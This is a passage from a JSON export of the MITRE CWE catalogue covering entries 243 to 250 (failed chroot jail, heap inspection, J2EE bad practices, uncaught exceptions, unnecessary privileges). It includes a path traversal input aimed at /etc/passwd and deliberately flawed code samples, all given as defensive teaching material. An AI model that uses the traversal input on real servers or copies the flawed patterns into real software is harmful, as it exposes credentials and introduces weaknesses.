to implement the FTP GET command. The FTP server calls chroot() in its initialization routines in an attempt to prevent access to files outside of /var/ftproot. But because the server does not change the current working directory by calling chdir(\\"/\\"), an attacker could request the file \\"../../../../../etc/passwd\\" and obtain a copy of the system password file."}},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Directory Restriction"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP17","Entry_Name":"Failed chroot jail"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Background_Details, Description, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Causal_Nature, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"}],"Previous_Entry_Name":[{"#text":"Directory Restriction","attr":{"@_Date":"2008-01-30"}},{"#text":"Failure to Change Working Directory in chroot Jail","attr":{"@_Date":"2010-12-13"}}]}},"244":{"attr":{"@_ID":"244","@_Name":"Improper Clearing of Heap Memory Before Release (\'Heap Inspection\')","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"Using realloc() to resize buffers that store sensitive information can leave the sensitive information exposed to attack, because it is not removed from memory.","Extended_Description":"When sensitive data such as a password or an encryption key is not removed from memory, it could be exposed to an attacker using a \\"heap inspection\\" attack that reads the sensitive data using memory dumps or other methods. The realloc() function is commonly used to increase the size of a block of allocated memory. This operation often requires copying the contents of the old memory block into a new and larger block. This operation leaves the contents of the original block intact but inaccessible to the program, preventing the program from being able to scrub sensitive data from memory. If an attacker can later examine the contents of a memory dump, the sensitive data could be exposed.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"226","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"669","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Other"],"Impact":["Read Memory","Other"],"Note":"Be careful using vfork() and fork() in security sensitive code. The process state will not be cleaned up and will contain traces of data from past use."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-148"},"Intro_Text":"The following code calls realloc() on a buffer containing sensitive data:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"cleartext_buffer = get_secret();...cleartext_buffer = realloc(cleartext_buffer, 1024);...scrub_memory(cleartext_buffer, 1024);","xhtml:br":["","",""]}},"Body_Text":"There is an attempt to scrub the sensitive data from memory, but realloc() is used, so it could return a pointer to a different part of memory. The memory that was originally allocated for cleartext_buffer could still contain an uncleared copy of the data."}},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Heap Inspection"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM03-C","Entry_Name":"Clear sensitive information stored in reusable resources returned for reuse"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Name, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":[{"#text":"Heap Inspection","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Clear Heap Memory Before Release","attr":{"@_Date":"2008-09-09"}},{"#text":"Failure to Clear Heap Memory Before Release (aka \'Heap Inspection\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Failure to Clear Heap Memory Before Release (\'Heap Inspection\')","attr":{"@_Date":"2010-12-13"}}]}},"245":{"attr":{"@_ID":"245","@_Name":"J2EE Bad Practices: Direct Management of Connections","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The J2EE application directly manages connections, instead of using the container\'s connection management facilities.","Extended_Description":"The J2EE standard forbids the direct management of connections. It requires that applications use the container\'s resource management facilities to obtain connections to resources. Every major web application container provides pooled database connection management as part of its resource management framework. Duplicating this functionality in an application is difficult and error prone, which is part of the reason it is forbidden under the J2EE standard.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"695","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following example, the class DatabaseConnection opens and manages a connection to a database for a J2EE application. The method openDatabaseConnection opens a connection to the database using a DriverManager to create the Connection object conn to the database specified in the string constant CONNECT_STRING.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class DatabaseConnection {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private static final String CONNECT_STRING = \\"jdbc:mysql://localhost:3306/mysqldb\\";private Connection conn = null;public DatabaseConnection() {}public void openDatabaseConnection() {}// Member functions for retrieving database connection and accessing database...","xhtml:br":["","","","","","","","",""],"xhtml:div":{"#text":"try {} catch (SQLException ex) {...}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"conn = DriverManager.getConnection(CONNECT_STRING);","attr":{"@_style":"margin-left:10px;"}}}}}}},{"attr":{"@_Nature":"good"},"xhtml:div":{"#text":"public class DatabaseConnection {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private static final String DB_DATASRC_REF = \\"jdbc:mysql://localhost:3306/mysqldb\\";private Connection conn = null;public DatabaseConnection() {}public void openDatabaseConnection() {}// Member functions for retrieving database connection and accessing database...","xhtml:br":["","","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (NamingException ex) {...}} catch (SQLException ex) {...}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"InitialContext ctx = new InitialContext();DataSource datasource = (DataSource) ctx.lookup(DB_DATASRC_REF);conn = datasource.getConnection();","xhtml:br":["","",""]}},"xhtml:br":""}}}}}}],"Body_Text":"The use of the DriverManager class to directly manage the connection to the database violates the J2EE restriction against the direct management of connections. The J2EE application should use the web application container\'s resource management facilities to obtain a connection to the database as shown in the following example."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"J2EE Bad Practices: getConnection()"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"J2EE Bad Practices: getConnection()","attr":{"@_Date":"2008-04-11"}}}},"246":{"attr":{"@_ID":"246","@_Name":"J2EE Bad Practices: Direct Use of Sockets","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The J2EE application directly uses sockets instead of using framework method calls.","Extended_Description":{"xhtml:p":["The J2EE standard permits the use of sockets only for the purpose of communication with legacy systems when no higher-level protocol is available. Authoring your own communication protocol requires wrestling with difficult security issues.","Without significant scrutiny by a security expert, chances are good that a custom communication protocol will suffer from security problems. Many of the same issues apply to a custom implementation of a standard protocol. While there are usually more resources available that address security concerns related to implementing a standard protocol, these resources are also available to attackers."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"695","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Use framework method calls instead of using sockets directly."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example opens a socket to connect to a remote server.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...Socket sock = null;try {} catch (Exception e) {}","xhtml:br":["","","","","","",""],"xhtml:i":["// Perform servlet tasks.","// Open a socket to a remote server (bad)."],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"sock = new Socket(remoteHostname, 3000);...","xhtml:br":["","",""],"xhtml:i":"// Do something with the socket."}},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}}}},"Body_Text":"A Socket object is created directly within the Java servlet, which is a dangerous way to manage remote connections."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"J2EE Bad Practices: Sockets"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"J2EE Bad Practices: Sockets","attr":{"@_Date":"2008-04-11"}}}},"247":{"attr":{"@_ID":"247","@_Name":"DEPRECATED: Reliance on DNS Lookups in a Security Decision","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated because it was a duplicate of CWE-350. All content has been transferred to CWE-350.","Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-06-23","Modification_Importance":"Critical","Modification_Comment":"CWE-247 and CWE-292 deprecated and merged into CWE-350 to address duplicates."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, Other_Notes, Potential_Mitigations, References, Related_Attack_Patterns, Relationships, Time_of_Introduction, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Name, References"}],"Previous_Entry_Name":[{"#text":"Often Misused: Authentication","attr":{"@_Date":"2008-04-11"}},{"#text":"Reliance on DNS Lookups in a Security Decision","attr":{"@_Date":"2013-07-17"}},{"#text":"DEPRECATED (Duplicate): Reliance on DNS Lookups in a Security Decision","attr":{"@_Date":"2021-07-20"}}]}},"248":{"attr":{"@_ID":"248","@_Name":"Uncaught Exception","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"An exception is thrown from a function, but it is not caught.","Extended_Description":"When an exception is not caught, it may cause the program to crash or expose sensitive information.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"705","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Availability","Confidentiality"],"Impact":["DoS: Crash, Exit, or Restart","Read Application Data"],"Note":"An uncaught exception could cause the system to be placed in a state that could lead to a crash, exposure of sensitive information or other unintended behaviors."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-39"},"Intro_Text":"The following example attempts to resolve a hostname.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"protected void doPost (HttpServletRequest req, HttpServletResponse res) throws IOException {}","xhtml:div":{"#text":"String ip = req.getRemoteAddr();InetAddress addr = InetAddress.getByName(ip);...out.println(\\"hello \\" + addr.getHostName());","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}}},"Body_Text":"A DNS lookup failure will cause the Servlet to throw an exception."},{"Intro_Text":"The _alloca() function allocates memory on the stack. If an allocation request is too large for the available stack space, _alloca() throws an exception. If the exception is not caught, the program will crash, potentially enabling a denial of service attack. _alloca() has been deprecated as of Microsoft Visual Studio 2005(R). It has been replaced with the more secure _alloca_s()."},{"Intro_Text":"EnterCriticalSection() can raise an exception, potentially causing the program to crash. Under operating systems prior to Windows 2000, the EnterCriticalSection() function can raise an exception in low memory situations. If the exception is not caught, the program will crash, potentially enabling a denial of service attack."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Often Misused: Exception Handling"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR05-J","Entry_Name":"Do not let checked exceptions escape from a finally block"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR06-J","Entry_Name":"Do not throw undeclared checked exceptions"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"EXP31-PL","Entry_Name":"Do not suppress or ignore exceptions","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP4","Entry_Name":"Unchecked Status Condition"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-24","Modification_Comment":"Removed C from Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Often Misused: Exception Handling","attr":{"@_Date":"2008-01-30"}}}},"249":{"attr":{"@_ID":"249","@_Name":"DEPRECATED: Often Misused: Path Manipulation","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated because of name\\n\\tconfusion and an accidental combination of multiple\\n\\tweaknesses. Most of its content has been transferred to\\n\\tCWE-785.\\n\\n        This entry was deprecated for several reasons. The primary\\n        reason is over-loading of the \\"path manipulation\\" term and the\\n        description. The original description for this entry was the\\n        same as that for the \\"Often Misused: File System\\" item in the\\n        original Seven Pernicious Kingdoms paper. However, Seven\\n        Pernicious Kingdoms also has a \\"Path Manipulation\\" phrase that\\n        is for external control of pathnames (CWE-73), which is a\\n        factor in symbolic link following and path traversal, neither\\n        of which is explicitly mentioned in 7PK. Fortify uses the\\n        phrase \\"Often Misused: Path Manipulation\\" for a broader range\\n        of problems, generally for issues related to buffer\\n        management. Given the multiple conflicting uses of this term,\\n        there is a chance that CWE users may have incorrectly mapped\\n        to this entry.\\n\\n\\tThe second reason for deprecation is an implied combination of\\n\\tmultiple weaknesses within buffer-handling functions. The\\n\\tfocus of this entry was generally on the path-conversion\\n\\tfunctions and their association with buffer\\n\\toverflows. However, some of Fortify\'s Vulncat entries have the\\n\\tterm \\"path manipulation\\" but describe a non-overflow weakness\\n\\tin which the buffer is not guaranteed to contain the entire\\n\\tpathname, i.e., there is information truncation (see CWE-222\\n\\tfor a similar concept). A new entry for this non-overflow\\n\\tweakness may be created in a future version of CWE.","Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Importance":"Critical","Modification_Comment":"Described inconsistencies in this entry, which the CWE Content Team had already slated for deprecation."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Affected_Resources, Applicable_Platforms, Demonstrative_Examples, Description, Maintenance_Notes, Name, Other_Notes, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Description, Maintenance_Notes"}],"Previous_Entry_Name":{"#text":"Often Misused: Path Manipulation","attr":{"@_Date":"2009-07-27"}}}},"250":{"attr":{"@_ID":"250","@_Name":"Execution with Unnecessary Privileges","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses.","Extended_Description":{"xhtml:p":["New weaknesses can be exposed because running with extra privileges, such as root or Administrator, can disable the normal security checks being performed by the operating system or surrounding environment. Other pre-existing weaknesses can turn into security vulnerabilities if they occur while operating at raised privileges.","Privilege management functions can behave in some less-than-obvious ways, and they have different quirks on different platforms. These inconsistencies are particularly pronounced if you are transitioning from one non-root user to another. Signal handlers and spawned processes run at the privilege of the owning process, so if a process is running as root when a signal fires or a sub-process is executed, the signal handler or sub-process will operate with root 